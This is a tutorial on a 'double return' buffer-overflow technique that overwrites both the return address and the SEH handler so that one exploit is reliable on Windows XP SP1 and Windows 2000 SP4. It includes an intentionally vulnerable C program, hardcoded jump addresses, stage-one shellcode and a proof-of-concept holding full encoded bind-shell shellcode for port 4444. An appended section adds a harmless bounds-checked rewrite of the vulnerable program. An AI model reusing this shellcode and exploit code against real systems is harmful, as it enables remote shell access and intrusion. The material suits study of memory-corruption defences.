The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler located at the top of the stack (its highest addresses). When exploiting a normal buffer overflow vulnerability we overwrite the return address; in this case we keep overwriting the stack past it so that the default exception handler is overwritten as well.
[Buf]                  <- Shellcode
[Return Address]       <- jmp register (for Windows XP SP1)
[Various Stack Data]   <- Junk
[Pointer To Next SEH]  <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler]           <- jmp register (for Win2k SP4)
[Stage1 Shellcode]     <- stage1 shellcode for Win2k

If the first return address (the Windows XP SP1 one) is wrong, the process raises an exception and the overwritten default exception handler is called instead (the Windows 2000 SP4 address). This lets us build one exploit that carries two return addresses and stays stable on both systems.
Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac
Vulnerable Code:

//lamebuf.c
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2) { return -1; }

    strcpy(buf, argv[1]); // unbounded copy of argv[1] into the 512-byte buf
    return 0x0;
}

Getting Started:

Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:
EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:

0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler
We successfully overwrote both the return address and the default exception handler.

Primary Return Address (Windows XP SP1 EN):

The first return address is used exactly as in a normal stack overflow. Since ESP points into our user input, the bytes at ESP become our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode will be:

"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):

The secondary return address is used exactly as in a normal SEH overwrite. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode will be:

"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
Proof Of Concept:

// exploit.c
// Tal zeltzer - [Double Return] //

#include <stdio.h>
#include <string.h>
#include <windows.h>

#define RET_XP    0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
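As an added example (my own code, not part of Tal Zeltzer's write-up), here is the hardened counterpart of lamebuf.c: the one check the vulnerable program is missing is a length test against the 512-byte stack buffer before the copy, so the 1600-byte all-'A' argument that crashed lamebuf.c with EIP=41414141 is rejected instead of running over the return address and the SEH record. The function names copy_bounded, copy_into_stack_buf, would_overflow and repeat_a are my own, and the all-'A' inputs are constructed to mirror the crash test above; windows.h is not needed, so the file builds with any C compiler.

```c
// Hardened counterpart of lamebuf.c (added example; not code from the original
// write-up). lamebuf.c copies argv[1] into char buf[512] with strcpy(), so any
// argument of 512 bytes or more runs past buf, over the saved return address and,
// with enough input, over the SEH record at the top of the stack. The fix is a
// length check against the destination size before anything is copied.
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512    /* same size as buf[512] in lamebuf.c */
#define SAMPLE_MAX 1600 /* length of the crash-test input in the write-up */

/* Reports whether a plain strcpy(dst, src) would write past dst_size bytes
 * (the string plus its terminating NUL must fit). 1 = overflow, 0 = fits. */
int would_overflow(const char *src, size_t dst_size)
{
    return strlen(src) + 1 > dst_size;
}

/* Bounded replacement for strcpy(): copies src into dst only if it fits,
 * including the NUL. Returns 0 on success; on overflow returns -1 and leaves
 * dst as an empty string rather than a partially copied one. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;
    if (would_overflow(src, dst_size)) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, strlen(src) + 1);
    return 0;
}

/* Same 512-byte stack buffer as lamebuf.c, but filled with copy_bounded().
 * Returns 0 if the input was copied, -1 if it was rejected. */
int copy_into_stack_buf(const char *src)
{
    char buf[BUF_SIZE];
    return copy_bounded(buf, sizeof buf, src);
}

/* Constructed test input (hypothetical helper): n bytes of 'A', capped at
 * SAMPLE_MAX, mirroring the 1600-byte 'A' argument from the crash test. */
const char *repeat_a(size_t n)
{
    static char sample[SAMPLE_MAX + 1];
    if (n > SAMPLE_MAX)
        n = SAMPLE_MAX;
    memset(sample, 'A', n);
    sample[n] = '\0';
    return sample;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return -1;
    }
    if (copy_into_stack_buf(argv[1]) != 0) {
        fprintf(stderr, "rejected: %zu bytes, buffer holds at most %d\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes safely\n", strlen(argv[1]));
    return 0;
}
```

It takes the same single argument as lamebuf.c. An argument of up to 511 bytes is copied; 512 bytes or more (including the 1600-byte crash input) is refused with exit code 1 and a diagnostic, and no stack data beyond buf is ever written.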